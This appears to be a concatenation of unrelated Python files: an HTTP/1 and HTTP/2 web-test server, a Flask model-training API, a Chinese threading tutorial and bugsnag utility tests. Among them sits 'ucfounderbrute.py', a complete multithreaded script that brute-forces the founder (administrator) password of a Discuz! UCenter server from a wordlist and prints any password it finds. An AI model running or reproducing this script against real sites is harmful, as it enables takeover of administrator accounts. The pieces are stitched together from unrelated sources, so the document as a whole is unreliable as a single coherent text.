class BaseWebTestRequestHandler(http.server.BaseHTTPRequestHandler):
"""RequestHandler for WebTestHttpd"""
def __init__(self, *args, **kwargs):
self.logger = get_logger()
http.server.BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
def finish_handling_h1(self, request_line_is_valid):
self.server.rewriter.rewrite(self)
request = Request(self)
response = Response(self, request)
if request.method == "CONNECT":
self.handle_connect(response)
return
if not request_line_is_valid:
response.set_error(414)
response.write()
return
self.logger.debug("%s %s" % (request.method, request.request_path))
handler = self.server.router.get_handler(request)
self.finish_handling(request, response, handler)
def finish_handling(self, request, response, handler):
# If the handler we used for the request had a non-default base path
# set update the doc_root of the request to reflect this
if hasattr(handler, "base_path") and handler.base_path:
request.doc_root = handler.base_path
if hasattr(handler, "url_base") and handler.url_base != "/":
request.url_base = handler.url_base
if self.server.latency is not None:
if callable(self.server.latency):
latency = self.server.latency()
else:
latency = self.server.latency
self.logger.warning("Latency enabled. Sleeping %i ms" % latency)
time.sleep(latency / 1000.)
if handler is None:
self.logger.debug("No Handler found!")
response.set_error(404)
else:
try:
handler(request, response)
except HTTPException as e:
if 500 <= e.code < 600:
self.logger.warning("HTTPException in handler: %s" % e)
self.logger.warning(traceback.format_exc())
response.set_error(e.code, str(e))
except Exception as e:
self.respond_with_error(response, e)
self.logger.debug("%i %s %s (%s) %i" % (response.status[0],
request.method,
request.request_path,
request.headers.get('Referer'),
request.raw_input.length))
if not response.writer.content_written:
response.write()
# If a python handler has been used, the old ones won't send a END_STR data frame, so this
# allows for backwards compatibility by accounting for these handlers that don't close streams
if isinstance(response, H2Response) and not response.writer.stream_ended:
response.writer.end_stream()
# If we want to remove this in the future, a solution is needed for
# scripts that produce a non-string iterable of content, since these
# can't set a Content-Length header. A notable example of this kind of
# problem is with the trickle pipe i.e. foo.js?pipe=trickle(d1)
if response.close_connection:
self.close_connection = True
if not self.close_connection:
# Ensure that the whole request has been read from the socket
request.raw_input.read()
def handle_connect(self, response):
self.logger.debug("Got CONNECT")
response.status = 200
response.write()
if self.server.encrypt_after_connect:
self.logger.debug("Enabling SSL for connection")
self.request = ssl.wrap_socket(self.connection,
keyfile=self.server.key_file,
certfile=self.server.certificate,
server_side=True)
self.setup()
return
def respond_with_error(self, response, e):
message = str(e)
if message:
err = [message]
else:
err = []
err.append(traceback.format_exc())
response.set_error(500, "\n".join(err))
class Http2WebTestRequestHandler(BaseWebTestRequestHandler):
protocol_version = "HTTP/2.0"
def handle_one_request(self):
"""
This is the main HTTP/2.0 Handler.
When a browser opens a connection to the server
on the HTTP/2.0 port, the server enters this which will initiate the h2 connection
and keep running throughout the duration of the interaction, and will read/write directly
from the socket.
Because there can be multiple H2 connections active at the same
time, a UUID is created for each so that it is easier to tell them apart in the logs.
"""
config = H2Configuration(client_side=False)
self.conn = H2ConnectionGuard(H2Connection(config=config))
self.close_connection = False
# Generate a UUID to make it easier to distinguish different H2 connection debug messages
self.uid = str(uuid.uuid4())[:8]
self.logger.debug('(%s) Initiating h2 Connection' % self.uid)
with self.conn as connection:
# Bootstrapping WebSockets with HTTP/2 specification requires
# ENABLE_CONNECT_PROTOCOL to be set in order to enable WebSocket
# over HTTP/2
new_settings = dict(connection.local_settings)
new_settings[SettingCodes.ENABLE_CONNECT_PROTOCOL] = 1
connection.local_settings.update(new_settings)
connection.local_settings.acknowledge()
connection.initiate_connection()
data = connection.data_to_send()
window_size = connection.remote_settings.initial_window_size
self.request.sendall(data)
# Dict of { stream_id: (thread, queue) }
stream_queues = {}
try:
while not self.close_connection:
data = self.request.recv(window_size)
if data == '':
self.logger.debug('(%s) Socket Closed' % self.uid)
self.close_connection = True
continue
with self.conn as connection:
frames = connection.receive_data(data)
window_size = connection.remote_settings.initial_window_size
self.logger.debug('(%s) Frames Received: ' % self.uid + str(frames))
for frame in frames:
if isinstance(frame, ConnectionTerminated):
self.logger.debug('(%s) Connection terminated by remote peer ' % self.uid)
self.close_connection = True
# Flood all the streams with connection terminated, this will cause them to stop
for stream_id, (thread, queue) in stream_queues.items():
queue.put(frame)
elif hasattr(frame, 'stream_id'):
if frame.stream_id not in stream_queues:
queue = Queue()
stream_queues[frame.stream_id] = (self.start_stream_thread(frame, queue), queue)
stream_queues[frame.stream_id][1].put(frame)
if isinstance(frame, StreamEnded) or (hasattr(frame, "stream_ended") and frame.stream_ended):
del stream_queues[frame.stream_id]
except OSError as e:
self.logger.error('(%s) Closing Connection - \n%s' % (self.uid, str(e)))
if not self.close_connection:
self.close_connection = True
except Exception as e:
self.logger.error('(%s) Unexpected Error - \n%s' % (self.uid, str(e)))
finally:
for stream_id, (thread, queue) in stream_queues.items():
queue.put(None)
thread.join()
def _is_extended_connect_frame(self, frame):
if not isinstance(frame, RequestReceived):
return False
method = extract_method_header(frame.headers)
if method != b"CONNECT":
return False
protocol = ""
for key, value in frame.headers:
if key in (b':protocol', ':protocol'):
protocol = isomorphic_encode(value)
break
if protocol != b"websocket":
raise ProtocolError("Invalid protocol %s with CONNECT METHOD" % (protocol,))
return True
def start_stream_thread(self, frame, queue):
"""
This starts a new thread to handle frames for a specific stream.
:param frame: The first frame on the stream
:param queue: A queue object that the thread will use to check for new frames
:return: The thread object that has already been started
"""
if self._is_extended_connect_frame(frame):
target = Http2WebTestRequestHandler._stream_ws_thread
else:
target = Http2WebTestRequestHandler._stream_thread
t = threading.Thread(
target=target,
args=(self, frame.stream_id, queue)
)
t.start()
return t
def _stream_ws_thread(self, stream_id, queue):
frame = queue.get(True, None)
if frame is None:
return
rfile, wfile = os.pipe()
rfile, wfile = os.fdopen(rfile, 'rb'), os.fdopen(wfile, 'wb', 0) # needs to be unbuffer for websockets
stream_handler = H2HandlerCopy(self, frame, rfile)
h2request = H2Request(stream_handler)
h2response = H2Response(stream_handler, h2request)
dispatcher = dispatch.Dispatcher(self.server.ws_doc_root, None, False)
if not dispatcher.get_handler_suite(stream_handler.path):
h2response.set_error(404)
h2response.write()
return
request_wrapper = _WebSocketRequest(stream_handler, h2response)
handshaker = WsH2Handshaker(request_wrapper, dispatcher)
try:
handshaker.do_handshake()
except HandshakeException as e:
self.logger.info('Handshake failed for error: %s' % e)
h2response.set_error(e.status)
h2response.write()
return
except AbortedByUserException:
h2response.write()
return
# h2 Handshaker prepares the headers but does not send them down the
# wire. Flush the headers here.
try:
h2response.write_status_headers()
except StreamClosedError:
# work around https://github.com/web-platform-tests/wpt/issues/27786
# The stream was already closed.
return
request_wrapper._dispatcher = dispatcher
# we need two threads:
# - one to handle the frame queue
# - one to handle the request (dispatcher.transfer_data is blocking)
# the alternative is to have only one (blocking) thread. That thread
# will call transfer_data. That would require a special case in
# handle_one_request, to bypass the queue and write data to wfile
# directly.
t = threading.Thread(
target=Http2WebTestRequestHandler._stream_ws_sub_thread,
args=(self, request_wrapper, stream_handler, queue)
)
t.start()
while not self.close_connection:
try:
frame = queue.get(True, 1)
except Empty:
continue
if isinstance(frame, DataReceived):
wfile.write(frame.data)
if frame.stream_ended:
raise NotImplementedError("frame.stream_ended")
wfile.close()
elif frame is None or isinstance(frame, (StreamReset, StreamEnded, ConnectionTerminated)):
self.logger.debug('(%s - %s) Stream Reset, Thread Closing' % (self.uid, stream_id))
break
t.join()
def _stream_ws_sub_thread(self, request, stream_handler, queue):
dispatcher = request._dispatcher
try:
dispatcher.transfer_data(request)
except StreamClosedError:
# work around https://github.com/web-platform-tests/wpt/issues/27786
# The stream was already closed.
queue.put(None)
return
stream_id = stream_handler.h2_stream_id
with stream_handler.conn as connection:
try:
connection.end_stream(stream_id)
data = connection.data_to_send()
stream_handler.request.sendall(data)
except StreamClosedError: # maybe the stream has already been closed
pass
queue.put(None)
def _stream_thread(self, stream_id, queue):
"""
This thread processes frames for a specific stream. It waits for frames to be placed
in the queue, and processes them. When it receives a request frame, it will start processing
immediately, even if there are data frames to follow. One of the reasons for this is that it
can detect invalid requests before needing to read the rest of the frames.
"""
# The file-like pipe object that will be used to share data to request object if data is received
wfile = None
request = None
response = None
req_handler = None
while not self.close_connection:
try:
frame = queue.get(True, 1)
except Empty:
# Restart to check for close_connection
continue
self.logger.debug('(%s - %s) %s' % (self.uid, stream_id, str(frame)))
if isinstance(frame, RequestReceived):
rfile, wfile = os.pipe()
rfile, wfile = os.fdopen(rfile, 'rb'), os.fdopen(wfile, 'wb')
stream_handler = H2HandlerCopy(self, frame, rfile)
stream_handler.server.rewriter.rewrite(stream_handler)
request = H2Request(stream_handler)
response = H2Response(stream_handler, request)
req_handler = stream_handler.server.router.get_handler(request)
if hasattr(req_handler, "frame_handler"):
# Convert this to a handler that will utilise H2 specific functionality, such as handling individual frames
req_handler = self.frame_handler(request, response, req_handler)
if hasattr(req_handler, 'handle_headers'):
req_handler.handle_headers(frame, request, response)
elif isinstance(frame, DataReceived):
wfile.write(frame.data)
if hasattr(req_handler, 'handle_data'):
req_handler.handle_data(frame, request, response)
if frame.stream_ended:
wfile.close()
elif frame is None or isinstance(frame, (StreamReset, StreamEnded, ConnectionTerminated)):
self.logger.debug('(%s - %s) Stream Reset, Thread Closing' % (self.uid, stream_id))
break
if request is not None:
request.frames.append(frame)
if hasattr(frame, "stream_ended") and frame.stream_ended:
try:
self.finish_handling(request, response, req_handler)
except StreamClosedError:
self.logger.debug('(%s - %s) Unable to write response; stream closed' %
(self.uid, stream_id))
break
def frame_handler(self, request, response, handler):
try:
return handler.frame_handler(request)
except HTTPException as e:
response.set_error(e.code, str(e))
response.write()
except Exception as e:
self.respond_with_error(response, e)
response.write()
class H2ConnectionGuard:
"""H2Connection objects are not threadsafe, so this keeps thread safety"""
lock = threading.Lock()
def __init__(self, obj):
assert isinstance(obj, H2Connection)
self.obj = obj
def __enter__(self):
self.lock.acquire()
return self.obj
def __exit__(self, exception_type, exception_value, traceback):
self.lock.release()
class H2Headers(dict):
def __init__(self, headers):
self.raw_headers = OrderedDict()
for key, val in headers:
key = isomorphic_decode(key)
val = isomorphic_decode(val)
self.raw_headers[key] = val
dict.__setitem__(self, self._convert_h2_header_to_h1(key), val)
def _convert_h2_header_to_h1(self, header_key):
if header_key[1:] in h2_headers and header_key[0] == ':':
return header_key[1:]
else:
return header_key
# TODO This does not seem relevant for H2 headers, so using a dummy function for now
def getallmatchingheaders(self, header):
return ['dummy function']
class H2HandlerCopy:
def __init__(self, handler, req_frame, rfile):
self.headers = H2Headers(req_frame.headers)
self.command = self.headers['method']
self.path = self.headers['path']
self.h2_stream_id = req_frame.stream_id
self.server = handler.server
self.protocol_version = handler.protocol_version
self.client_address = handler.client_address
self.raw_requestline = ''
self.rfile = rfile
self.request = handler.request
self.conn = handler.conn
class Http1WebTestRequestHandler(BaseWebTestRequestHandler):
protocol_version = "HTTP/1.1"
def handle_one_request(self):
response = None
try:
self.close_connection = False
request_line_is_valid = self.get_request_line()
if self.close_connection:
return
request_is_valid = self.parse_request()
if not request_is_valid:
#parse_request() actually sends its own error responses
return
self.finish_handling_h1(request_line_is_valid)
except socket.timeout as e:
self.log_error("Request timed out: %r", e)
self.close_connection = True
return
except Exception:
err = traceback.format_exc()
if response:
response.set_error(500, err)
response.write()
def get_request_line(self):
try:
self.raw_requestline = self.rfile.readline(65537)
except OSError:
self.close_connection = True
return False
if len(self.raw_requestline) > 65536:
self.requestline = ''
self.request_version = ''
self.command = ''
return False
if not self.raw_requestline:
self.close_connection = True
return True
class WebTestHttpd:
"""
:param host: Host from which to serve (default: 127.0.0.1)
:param port: Port from which to serve (default: 8000)
:param server_cls: Class to use for the server (default depends on ssl vs non-ssl)
:param handler_cls: Class to use for the RequestHandler
:param use_ssl: Use a SSL server if no explicit server_cls is supplied
:param key_file: Path to key file to use if ssl is enabled
:param certificate: Path to certificate file to use if ssl is enabled
:param encrypt_after_connect: For each connection, don't start encryption
until a CONNECT message has been received.
This enables the server to act as a
self-proxy.
:param router_cls: Router class to use when matching URLs to handlers
:param doc_root: Document root for serving files
:param ws_doc_root: Document root for websockets
:param routes: List of routes with which to initialize the router
:param rewriter_cls: Class to use for request rewriter
:param rewrites: List of rewrites with which to initialize the rewriter_cls
:param config: Dictionary holding environment configuration settings for
handlers to read, or None to use the default values.
:param bind_address: Boolean indicating whether to bind server to IP address.
:param latency: Delay in ms to wait before serving each response, or
callable that returns a delay in ms
HTTP server designed for testing scenarios.
Takes a router class which provides one method get_handler which takes a Request
and returns a handler function.
.. attribute:: host
The host name or ip address of the server
.. attribute:: port
The port on which the server is running
.. attribute:: router
The Router object used to associate requests with resources for this server
.. attribute:: rewriter
The Rewriter object used for URL rewriting
.. attribute:: use_ssl
Boolean indicating whether the server is using ssl
.. attribute:: started
Boolean indicating whether the server is running
"""
def __init__(self, host="127.0.0.1", port=8000,
server_cls=None, handler_cls=Http1WebTestRequestHandler,
use_ssl=False, key_file=None, certificate=None, encrypt_after_connect=False,
router_cls=Router, doc_root=os.curdir, ws_doc_root=None, routes=None,
rewriter_cls=RequestRewriter, bind_address=True, rewrites=None,
latency=None, config=None, http2=False):
if routes is None:
routes = default_routes.routes
self.host = host
self.router = router_cls(doc_root, routes)
self.rewriter = rewriter_cls(rewrites if rewrites is not None else [])
self.use_ssl = use_ssl
self.http2 = http2
self.logger = get_logger()
if server_cls is None:
server_cls = WebTestServer
if use_ssl:
if not os.path.exists(key_file):
raise ValueError(f"SSL certificate not found: {key_file}")
if not os.path.exists(certificate):
raise ValueError(f"SSL key not found: {certificate}")
try:
self.httpd = server_cls((host, port),
handler_cls,
self.router,
self.rewriter,
config=config,
bind_address=bind_address,
ws_doc_root=ws_doc_root,
use_ssl=use_ssl,
key_file=key_file,
certificate=certificate,
encrypt_after_connect=encrypt_after_connect,
latency=latency,
http2=http2)
self.started = False
_host, self.port = self.httpd.socket.getsockname()
except Exception:
self.logger.critical("Failed to start HTTP server on port %s; "
"is something already using that port?" % port)
raise
def start(self):
"""Start the server.
:param block: True to run the server on the current thread, blocking,
False to run on a separate thread."""
http_type = "http2" if self.http2 else "https" if self.use_ssl else "http"
self.logger.info("Starting %s server on %s:%s" % (http_type, self.host, self.port))
self.started = True
self.server_thread = threading.Thread(target=self.httpd.serve_forever)
self.server_thread.setDaemon(True) # don't hang on exit
self.server_thread.start()
def stop(self):
"""
Stops the server.
If the server is not running, this method has no effect.
"""
if self.started:
try:
self.httpd.shutdown()
self.httpd.server_close()
self.server_thread.join()
self.server_thread = None
self.logger.info("Stopped http server on %s:%s" % (self.host, self.port))
except AttributeError:
pass
self.started = False
self.httpd = None
def get_url(self, path="/", query=None, fragment=None):
if not self.started:
return None
return urlunsplit(("http" if not self.use_ssl else "https",
"%s:%s" % (self.host, self.port),
path, query, fragment))
class _WebSocketConnection:
def __init__(self, request_handler, response):
"""Mimic mod_python mp_conn.
:param request_handler: A H2HandlerCopy instance.
:param response: A H2Response instance.
"""
self._request_handler = request_handler
self._response = response
self.remote_addr = self._request_handler.client_address
def write(self, data):
self._response.writer.write_data(data, False)
def read(self, length):
return self._request_handler.rfile.read(length)
class _WebSocketRequest:
def __init__(self, request_handler, response):
"""Mimic mod_python request.
:param request_handler: A H2HandlerCopy instance.
:param response: A H2Response instance.
"""
self.connection = _WebSocketConnection(request_handler, response)
self.protocol = "HTTP/2"
self._response = response
self.uri = request_handler.path
self.unparsed_uri = request_handler.path
self.method = request_handler.command
# read headers from request_handler
self.headers_in = request_handler.headers
# write headers directly into H2Response
self.headers_out = response.headers
# proxies status to H2Response
@property
def status(self):
return self._response.status
@status.setter
def status(self, status):
self._response.status = status
|
ucfounderbrute.py
|
#coding:utf-8
import requests
import sys
from threading import Thread
from Queue import Queue
NUM=5
dicpath='top5000.txt'
apptype='DISCUZX'
appname='Discuz!'
appurl='localhost'
ucclientrelease='20110501'
ucapi='http://target/uc_server' # no '/' in the end!!
def testucserver():
try:
r=requests.get(ucapi+'/index.php?m=app&a=ucinfo&release='+ucclientrelease)
if 'UC_STATUS_OK' in r.text:
return True
except Exception as e:
print e
pass
return False
def brute():
while True:
founderpw=q.get()
data={'m':'app','a':'add','ucfounder':'','ucfounderpw':founderpw,'apptype':apptype,'appname':appname,'appurl':appurl,'appip':'','appcharset':'gbk','appdbcharset':'gbk','release':ucclientrelease}
posturl=ucapi+'/index.php'
r = requests.post(posturl,data)
while r.status_code!=200:
r = requests.post(posturl,data)
rt=r.text
#print rt
if rt!='-1' and rt!='':
print 'Founder Password found! : '+founderpw
print rt
break
sys.exit()
q.task_done()
if __name__ == '__main__':
if testucserver()==False:
print 'UCAPI error'
sys.exit()
q=Queue()
for i in range(NUM):
t = Thread(target=brute)
t.daemon=True
t.start()
print 'Threads started'
with open(dicpath) as f:
for line in f:
pw = line.strip()
q.put(pw)
f.close()
q.join()
|
app.py
|
import io
import os
import time
import json
import pickle
from uuid import uuid4
from threading import Thread
from flask import Flask, jsonify, request, send_file
from classification import ClassificationInputModel, do_autoclassification, NotSupportedMetricException
app = Flask(__name__)
error_logs_path = 'error_logs'
os.makedirs(error_logs_path, exist_ok=True)
saved_models_path = 'saved_models'
os.makedirs(saved_models_path, exist_ok=True)
def check_calculation_status_decorator(funciton):
def wrapper(*args, **kwargs):
model_id = request.args.get('model_id')
if f'{model_id}.log' in os.listdir(error_logs_path):
with open(os.path.join(error_logs_path, f'{model_id}.log'), 'r') as file:
exception = file.readline()
return exception, 500
elif f'{model_id}.pickle' not in os.listdir(saved_models_path):
return 'not calculated yet', 102
else:
return funciton(*args, **kwargs)
wrapper.__name__ = funciton.__name__
return wrapper
@app.route('/start_classification', methods=['POST'])
def auto_classification():
try:
model_id = uuid4()
params = ClassificationInputModel(**json.loads(request.data))
thread = Thread(target=do_autoclassification, args=(params, model_id))
thread.start()
return jsonify({'model_id': model_id}), 201
except NotSupportedMetricException as e:
return str(e), 400
@app.route('/get_model')
@check_calculation_status_decorator
def get_model():
model_id = request.args.get('model_id')
with open(os.path.join(saved_models_path, f'{model_id}.pickle'), 'rb') as file:
model = pickle.load(file)
return send_file(io.BytesIO(model._to_pickle_string()), download_name='model.pickle'), 200
@app.route('/get_score')
@check_calculation_status_decorator
def get_score():
model_id = request.args.get('model_id')
with open(os.path.join(saved_models_path, f'{model_id}.pickle'), 'rb') as file:
model = pickle.load(file)
print(model.score)
return {'model_id': model_id, 'score': model.score, 'score_type': model.score_type}, 200
|
invoke_run.py
|
# coding: utf-8
#########################################################################
# 网站: <a href="http://www.crazyit.org">疯狂Java联盟</a> #
# author yeeku.H.lee kongyeeku@163.com #
# #
# version 1.0 #
# #
# Copyright (C), 2001-2018, yeeku.H.Lee #
# #
# This program is protected by copyright laws. #
# #
# Program Name: #
# #
# <br>Date: #
#########################################################################
import threading
# 定义准备作为线程执行体的action函数
def action(max):
for i in range(max):
# 直接调用run()方法时,Thread的name属性返回的是该对象的名字
# 而不是当前线程的名字
# 使用threading.current_thread().name总是获取当前线程的名字
print(threading.current_thread().name + " " + str(i)) # ①
for i in range(100):
# 调用Thread的currentThread()方法获取当前线程
print(threading.current_thread().name + " " + str(i))
if i == 20:
# 直接调用线程对象的run()方法
# 系统会把线程对象当成普通对象,把run()方法当成普通方法
# 所以下面两行代码并不会启动两个线程,而是依次执行两个run()方法
threading.Thread(target=action,args=(100,)).run()
threading.Thread(target=action,args=(100,)).run()
|
test_utils.py
|
import unittest
import json
import timeit
import sys
import datetime
import re
import threading
import uuid
from bugsnag.utils import (SanitizingJSONEncoder, FilterDict,
is_json_content_type, parse_content_type,
ThreadContextVar)
class TestUtils(unittest.TestCase):
def tearDown(self):
super(TestUtils, self).tearDown()
def test_encode_filters(self):
data = FilterDict({"credit_card": "123213213123", "password": "456",
"cake": True})
encoder = SanitizingJSONEncoder(keyword_filters=["credit_card",
"password"])
sane_data = json.loads(encoder.encode(data))
self.assertEqual(sane_data, {"credit_card": "[FILTERED]",
"password": "[FILTERED]",
"cake": True})
def test_sanitize_list(self):
data = FilterDict({"list": ["carrots", "apples", "peas"],
"passwords": ["abc", "def"]})
encoder = SanitizingJSONEncoder(keyword_filters=["credit_card",
"passwords"])
sane_data = json.loads(encoder.encode(data))
self.assertEqual(sane_data, {"list": ["carrots", "apples", "peas"],
"passwords": "[FILTERED]"})
def test_sanitize_valid_unicode_object(self):
data = {"item": '\U0001f62c'}
encoder = SanitizingJSONEncoder(keyword_filters=[])
sane_data = json.loads(encoder.encode(data))
self.assertEqual(sane_data, data)
def test_sanitize_nested_object_filters(self):
data = FilterDict({"metadata": {"another_password": "My password"}})
encoder = SanitizingJSONEncoder(keyword_filters=["password"])
sane_data = json.loads(encoder.encode(data))
self.assertEqual(sane_data,
{"metadata": {"another_password": "[FILTERED]"}})
def test_sanitize_bad_utf8_object(self):
data = {"bad_utf8": "test \xe9"}
encoder = SanitizingJSONEncoder(keyword_filters=[])
sane_data = json.loads(encoder.encode(data))
self.assertEqual(sane_data, data)
def test_sanitize_unencoded_object(self):
data = {"exc": Exception()}
encoder = SanitizingJSONEncoder(keyword_filters=[])
sane_data = json.loads(encoder.encode(data))
self.assertEqual(sane_data, {"exc": ""})
def test_json_encode(self):
payload = {"a": "a" * 512 * 1024}
expected = {"a": "a" * 1024}
encoder = SanitizingJSONEncoder(keyword_filters=[])
self.assertEqual(json.loads(encoder.encode(payload)), expected)
def test_filter_dict(self):
data = FilterDict({"metadata": {"another_password": "My password"}})
encoder = SanitizingJSONEncoder(keyword_filters=["password"])
sane_data = encoder.filter_string_values(data)
self.assertEqual(sane_data,
{"metadata": {"another_password": "[FILTERED]"}})
def test_decode_bytes(self):
data = FilterDict({b"metadata": "value"})
encoder = SanitizingJSONEncoder(keyword_filters=["password"])
sane_data = json.loads(encoder.encode(data))
self.assertEqual(sane_data, {"metadata": "value"})
def test_unfiltered_encode(self):
data = {"metadata": {"another_password": "My password"}}
encoder = SanitizingJSONEncoder(keyword_filters=["password"])
sane_data = json.loads(encoder.encode(data))
self.assertEqual(sane_data, data)
def test_thread_context_vars_get_raises_if_no_default(self):
token = ThreadContextVar(str(uuid.uuid4()))
self.assertRaises(LookupError, token.get)
def test_thread_context_vars_returns_default_value_from_get(self):
token = ThreadContextVar(str(uuid.uuid4()), default={'pips': 3})
self.assertEqual({'pips': 3}, token.get())
def test_thread_context_vars_set_new_value_with_no_default(self):
token = ThreadContextVar(str(uuid.uuid4()))
token.set({'peas': 'maybe'})
self.assertEqual({'peas': 'maybe'}, token.get())
def test_thread_context_vars_set_new_value(self):
token = ThreadContextVar(str(uuid.uuid4()), default={'pips': 3})
token.set({'carrots': 'no'})
self.assertEqual({'carrots': 'no'}, token.get())
def test_thread_context_vars_in_thread(self):
"""
Verify that ThreadContextVar backport has correct behavior
inside a new thread.
"""
token = ThreadContextVar(str(uuid.uuid4()), default={'pips': 3})
token.set({'pips': 4})
def thread_worker():
try:
thread.exc_info = None
result = token.get()
# Test that we got a new, unmodified copy of the default
self.assertEqual({'pips': 3}, result)
result['pips'] = 5
# Test that local modifications are persistent
self.assertEqual({'pips': 5}, token.get())
except Exception:
import sys
thread.exc_info = sys.exc_info()
thread = threading.Thread(target=thread_worker)
thread.start()
thread.join()
# ensure exceptions in the thread_worker fail the test
self.assertEqual(None, thread.exc_info, thread.exc_info)
# Test that non-local changes don't leak through
self.assertEqual({'pips': 4}, token.get())
def test_encoding_recursive(self):
"""
Test that recursive data structures are replaced with '[RECURSIVE]'
"""
data = {"Test": ["a", "b", "c"]}
data["Self"] = data
encoder = SanitizingJSONEncoder(keyword_filters=[])
sane_data = json.loads(encoder.encode(data))
self.assertEqual(sane_data,
{"Test": ["a", "b", "c"], "Self": "[RECURSIVE]"})
def test_encoding_recursive_repeated(self):
"""
Test that encoding the same object twice produces the same result
"""
data = {"Test": ["a", "b", "c"]}
data["Self"] = data
encoder = SanitizingJSONEncoder(keyword_filters=[])
sane_data = json.loads(encoder.encode(data))
self.assertEqual(sane_data,
{"Test": ["a", "b", "c"], "Self": "[RECURSIVE]"})
sane_data = json.loads(encoder.encode(data))
self.assertEqual(sane_data,
{"Test": ["a", "b", "c"], "Self": "[RECURSIVE]"})
def test_encoding_nested_repeated(self):
"""
Test that encoding the same object within a new object is not
incorrectly marked as recursive
"""
encoder = SanitizingJSONEncoder(keyword_filters=[])
data = {"Test": ["a", "b", "c"]}
encoder.encode(data)
data = {"Previous": data, "Other": 400}
sane_data = json.loads(encoder.encode(data))
self.assertEqual(sane_data,
{"Other": 400,
"Previous": {"Test": ["a", "b", "c"]}})
def test_encoding_oversized_recursive(self):
"""
Test that encoding an object which requires trimming clips recursion
correctly
"""
data = {"Test": ["a" * 128 * 1024, "b", "c"], "Other": {"a": 300}}
data["Self"] = data
encoder = SanitizingJSONEncoder(keyword_filters=[])
sane_data = json.loads(encoder.encode(data))
self.assertEqual(sane_data,
{"Test": ["a" * 1024, "b", "c"],
"Self": "[RECURSIVE]",
"Other": {"a": 300}})
def test_encoding_time(self):
"""
Test that encoding a large object is sufficiently speedy
"""
setup = """\
import json
from tests.large_object import large_object_file_path
from bugsnag.utils import SanitizingJSONEncoder
encoder = SanitizingJSONEncoder(keyword_filters=[])
with open(large_object_file_path()) as json_data:
data = json.load(json_data)
"""
stmt = """\
encoder.encode(data)
"""
time = timeit.timeit(stmt=stmt, setup=setup, number=1000)
maximum_time = 6
if sys.version_info[0:2] <= (2, 6):
# json encoding is very slow on python 2.6 so we need to increase
# the allowable time when running on it
maximum_time = 18
self.assertTrue(time < maximum_time,
"Encoding required {0}s (expected {1}s)".format(
time, maximum_time
))
def test_filter_string_values_list_handling(self):
"""
Test that filter_string_values can accept a list for the ignored
parameter for backwards compatibility
"""
data = {}
encoder = SanitizingJSONEncoder()
# no assert as we are just expecting this not to throw
encoder.filter_string_values(data, ['password'])
def test_sanitize_list_handling(self):
"""
Test that _sanitize can accept a list for the ignored parameter for
backwards compatibility
"""
data = {}
encoder = SanitizingJSONEncoder()
# no assert as we are just expecting this not to throw
encoder._sanitize(data, ['password'], ['password'])
def test_json_encode_invalid_keys(self):
"""
Test that _sanitize can accept some invalid json where a function
name or some other bad data is passed as a key in the payload
dictionary.
"""
encoder = SanitizingJSONEncoder(keyword_filters=[])
def foo():
return "123"
result = json.loads(encoder.encode({foo: "a"}))
self.assertTrue(re.match(r'<function.*foo.*',
list(result.keys())[0]) is not None)
self.assertEqual(list(result.values()), ["a"])
now = datetime.datetime.now()
result = json.loads(encoder.encode({now: "a"}))
self.assertEqual(list(result.keys())[0], str(now))
self.assertEqual(list(result.values()), ["a"])
class Object(object):
pass
result = json.loads(encoder.encode({Object(): "a"}))
self.assertTrue(re.match(r'<tests.test_utils.*Object.*',
list(result.keys())[0]) is not None)
self.assertEqual(list(result.values()), ["a"])
def test_filter_dict_with_inner_dict(self):
"""
Test that nested dict uniqueness checks work and are not recycled
when a reference to a nested dict goes out of scope
"""
data = {
'level1-key1': {
'level2-key1': FilterDict({
'level3-key1': {'level4-key1': 'level4-value1'},
'level3-key4': {'level4-key3': 'level4-value3'},
}),
'level2-key2': FilterDict({
'level3-key2': 'level3-value1',
'level3-key3': {'level4-key2': 'level4-value2'},
'level3-key5': {'level4-key4': 'level4-value4'},
}),
}
}
encoder = SanitizingJSONEncoder(keyword_filters=['password'])
sane_data = json.loads(encoder.encode(data))
self.assertEqual(sane_data, {
'level1-key1': {
'level2-key1': {
'level3-key1': {
'level4-key1': 'level4-value1'
},
'level3-key4': {
'level4-key3': 'level4-value3'
}
},
'level2-key2': {
'level3-key2': 'level3-value1',
'level3-key3': {
'level4-key2': 'level4-value2'
},
'level3-key5': {
'level4-key4': 'level4-value4'
},
},
}
})
def test_filter_strings_with_inner_dict(self):
"""
Test that nested dict uniqueness checks work and are not recycled
when a reference to a nested dict goes out of scope
"""
data = FilterDict({
'level1-key1': {
'level2-key1': {
'level3-key1': {'level4-key1': 'level4-value1'},
'token': 'mypassword',
},
'level2-key2': {
'level3-key3': {'level4-key2': 'level4-value2'},
'level3-key4': {'level4-key3': 'level4-value3'},
'level3-key5': {'password': 'super-secret'},
'level3-key6': {'level4-key4': 'level4-value4'},
'level3-key7': {'level4-key4': 'level4-value4'},
'level3-key8': {'level4-key4': 'level4-value4'},
'level3-key9': {'level4-key4': 'level4-value4'},
'level3-key0': {'level4-key4': 'level4-value4'},
},
}
})
encoder = SanitizingJSONEncoder(keyword_filters=['password', 'token'])
filtered_data = encoder.filter_string_values(data)
self.assertEqual(filtered_data, {
'level1-key1': {
'level2-key1': {
'level3-key1': {
'level4-key1': 'level4-value1'
},
'token': '[FILTERED]'
},
'level2-key2': {
'level3-key3': {
'level4-key2': 'level4-value2'
},
'level3-key4': {
'level4-key3': 'level4-value3'
},
'level3-key5': {
'password': '[FILTERED]'
},
'level3-key6': {
'level4-key4': 'level4-value4'
},
'level3-key7': {
'level4-key4': 'level4-value4'
},
'level3-key8': {
'level4-key4': 'level4-value4'
},
'level3-key9': {
'level4-key4': 'level4-value4'
},
'level3-key0': {
'level4-key4': 'level4-value4'
},
},
}
})
def test_parse_invalid_content_type(self):
info = parse_content_type('invalid-type')
self.assertEqual(('invalid-type', None, None, None), info)
def test_parse_invalid_content_type_params(self):
info = parse_content_type('invalid-type;schema=http://example.com/b')
self.assertEqual(('invalid-type', None, None,
'schema=http://example.com/b'), info)
def test_parse_parameters(self):
info = parse_content_type('text/plain;charset=utf-32')
self.assertEqual(('text', 'plain', None, 'charset=utf-32'), info)
def test_parse_suffix(self):
info = parse_content_type('application/hal+json;charset=utf-8')
self.assertEqual(('application', 'hal', 'json', 'charset=utf-8'), info)
def test_json_content_type(self):
self.assertTrue(is_json_content_type('application/json'))
self.assertTrue(is_json_content_type('application/hal+json'))
self.assertTrue(is_json_content_type('application/other+json'))
self.assertTrue(is_json_content_type(
'application/schema+json;schema=http://example.com/schema-2'))
self.assertTrue(is_json_content_type('application/json;charset=utf-8'))
